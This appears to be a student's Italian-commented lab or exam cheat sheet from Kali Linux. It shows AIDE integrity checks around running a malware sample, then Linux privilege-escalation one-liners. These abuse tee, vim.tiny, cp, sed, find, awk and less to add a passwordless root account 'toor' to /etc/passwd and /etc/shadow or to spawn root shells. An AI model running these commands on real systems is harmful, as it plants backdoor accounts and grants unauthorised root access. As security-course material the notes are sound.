#############################################################################
## PARTE 1 ##################################################################
#############################################################################

# Salviamo lo stato della macchina allo stato corrente
aide -c /home/kali/aide/aide.conf -i

# Copiamo il database
cp /home/kali/aide/aide.db{.new,}

# Eseguiamo il malware
sudo ./change

# Controlliamo differenze con lo stato precedente
aide -c /home/kali/aide/aide.conf -C

# Individuo la modifica



#############################################################################
## PARTE 2 ##################################################################
#############################################################################

# - - /usr/bin/tee con capability - - - - - 
echo "toor::0:0:System Administrator:/var/root:/bin/sh" | tee -a /etc/passwd
echo "toor::19445:0:99999:7:::" | tee -a /etc/shadow
su toor
id

# - - /usr/bin/vim.tiny con capability - - - -
vim.tiny /etc/shadow
vim.tiny /etc/passwd
su toor
id

# - - /usr/bin/cp con SUID - - -
cp /etc/passwd ~/esame/passwd_leggibile ; cat ~/esame/passwd_leggibile >> ~/esame/passwd_modificabile ; echo "toor::0:0:System Administrator:/var/root:/bin/sh" >> ~/esame/passwd_modificabile ; cp ~/esame/passwd_modificabile /etc/passwd
cp /etc/shadow ~/esame/shadow_leggibile ; cat ~/esame/shadow_leggibile >> ~/esame/shadow_modificabile ; echo "toor::19445:0:99999:7:::" >> ~/esame/shadow_modificabile ; cp ~/esame/shadow_modificabile /etc/shadow
su toor
id

# - - /usr/bin/sed - - -
sed -i 's/riga da eliminare//g' /etc/passwd

# - - /usr/bin/find - - -
find /etc -iname shadow -exec sed -i '$anuova_riga' {} \;
# $a --> scrive in append

# - - /usr/bin/awk - - -
awk 'BEGIN {system("/bin/sh")}'

# - - /usr/bin/less 
less /etc/profile
!/bin/sh

# - - 



























